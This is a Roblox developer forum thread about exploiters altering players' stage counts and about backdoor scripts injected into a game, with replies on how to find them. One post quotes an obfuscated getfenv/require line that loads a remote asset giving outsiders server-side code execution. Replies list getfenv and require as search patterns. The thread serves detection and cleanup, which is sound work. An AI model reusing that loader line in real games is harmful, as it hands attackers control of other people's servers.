Exploiters Altering Game Data

My new game has been having issues with exploiters. Sure there’s fly hackers and speed hackers but that’s not the main issue. The main issue is that there have been exploiters altering game data, or in my case, stages. There’s 61 stages in my game and some exploiters are able to change their own and other users’ stage count. We’ve been trying to develop an anti exploit for this but it’s not working, as I know people with advanced exploits that do help us test our antis.

We have been having a few backdoor scripts randomly inserted into our game, however we don’t know the origin of these backdoors. Plus, our game doesn’t have free models or scripts that are unknown, and the only plugin we use is F3x. The scripts hide themself with getfenv() and have names like…


I know that the game has a virus but I am unable to find its origins and this has been a huge problem as we’ve had to shut down our game multiple times due to this. Note that nothing the exploiters do appears in the Dev Console, or even in chat logs.


Make sure to check all your plugins. You can do that by running this in command bar:

game:GetObjects("rbxassetid://000")[1].Parent = workspace

Changing 000 to the ID of the plugin, of course. For any free model scripts, just search for terms like getfenv. And make sure to enable this setting:

So you can see where they might be hidden.

1 Like

The first thing to do is to figure out whether it’s a backdoor plugin or if it has to do with bad scripting. If all the server receives from the client is the name of the player, it’s likely that they’re using a simple exploit that calls the remote function over and over again to advance their stage.

In terms of removing backdoors, you can hit Control+Shift+F to look through scripts for calls like require() and other keywords that might point towards a backdoor. You can also go to File>Options>Studio>Scroll all the way down to enable Hidden Objects, Core GUI and Plugin GUI and try to see if there are scripts hidden in some sneaky places (a more common one is CSGDictionaryService)

Hope this helps!

Alright, I tried your method. There were 13 scripts with getfenv but they were all in the F3x building tools plugin. I don’t know if that means F3x is unreliable or…?

There were 494 lines with require but 474 with require(). Is the ladder the only one that would lead to backdoors?

I’d remove it and see if it goes away. I usually find it suspicious when modules, or plugins are using getfenv, as it’s an easy way to make code harder to read.

Check to make sure that the F3X plugin that your team is using is The Official F3X plugin. I’ve noticed that once Roblox opened up the marketplace for the general userbase there has been an explosion in the number of fake plugins that may house malicious scripts.

As for your question, I’m not too sure myself. Roblox probably has require()/require in their own scripts by default, so it might not be bad.

Yeah, I was using that plugin. I just didn’t want to trust that it had a lot of getfenv and require() and require. Roblox does use require but not require().

That is a bad sign. Is it something like this?

Variable = require

Make absolutely sure that you’re using the correct plugin. On your end, it should show a green “Item Owned” checkmark. If not, you probably grabbed a fake copy with backdoors.

Then check all your scripts. Anymore, malicious plugins insert backdoors into existing legitimate scripts to make it harder to remove them. They often make the horizontal scrollbar horribly long.

1 Like

Yeah, I’ve found a few of those. I am able to identify the scripts well but I don’t know what causes them to pop up in the first place. They usually will say like, This is a script from studio, do NOT delete this. in grayed out text. Not only are the horizontal bars extra long but the vertical one is also extra long. For a “two lined” script, 238 lines sure is a lot. Not only that, but the getfenv they have is getfenv()['\114\101\113\117\105\114\101'](4958213401) please don’t run this. I don’t know what this means or does because I dont’ script.

What the script normally says (note none of the parents influenced this they were injected by a virus)

This is the F3X I own. (note these links are Discord links)

Also no, it is not Variable = require.

It’s a require. That points to this model. basically loads more code. following the trail below


which goes to


then loads



this allows them to load code into the game using a admin gui that acts as a loadstring kind of thing, and only allows it for members in this group https://www.roblox.com/groups/6091888/hacker-c00lkid#!/about comes form https://www.roblox.com/library/4941366797/main

and the other one-
looks to be some kind of code executor, however, it’ll take a lot of time to reverse engineer.

tl;dr they are inserting a backdoor to allow people in that group, to run code in your game on the server side.

Am I able to find out what those do without ruining myself? Or will I have to input them on an alt?

Edit in reply to the post below: I think you edited it after I replied. I think I should be worried about them all too. I don’t know how I am able to prevent those assets all together though, nor do I know what is injecting them. It is not a free model or a plugin.

I just explained what they did, the ones I’d be worried about is “Asset”, and “main”. they are both very suspicous, and main is a code executor for exploiters. [allows them to execute code on the server

All you need to do is report the models, and delete the plugin from studio. Then you’re done.

Your game which I presume is this, follows the traditional obby format.

Exploiters changing their stage could be as simple as just teleporting to the stage brick, assuming it doesn’t check that you already passed through the previous stage first.

As for exploiters setting other’s stage, that could be a result of a backdoor (which you have already said), or some kind of RemoteEvent that is unsecured on the server, ie. using the 2nd argument as the player rather than the first (while this sounds silly, this actually happens a lot).

If you’re just using a simple .Touched event, then that can’t be the issue and it has to be a backdoor.

I’ve already said what’s happening, the backdoor was exposed earlier in this message

“this allows them to load code into the game using a admin gui that acts as a loadstring kind of thing, and only allows it for members in this group”

Great, then OP should just remove it.

No need to “reverse engineer it”, most of these are just a modified LBI, not very interesting.

1 Like

I’ve sent this to Community Sages/Dev Relations for better review. So let’s not remove anything yet…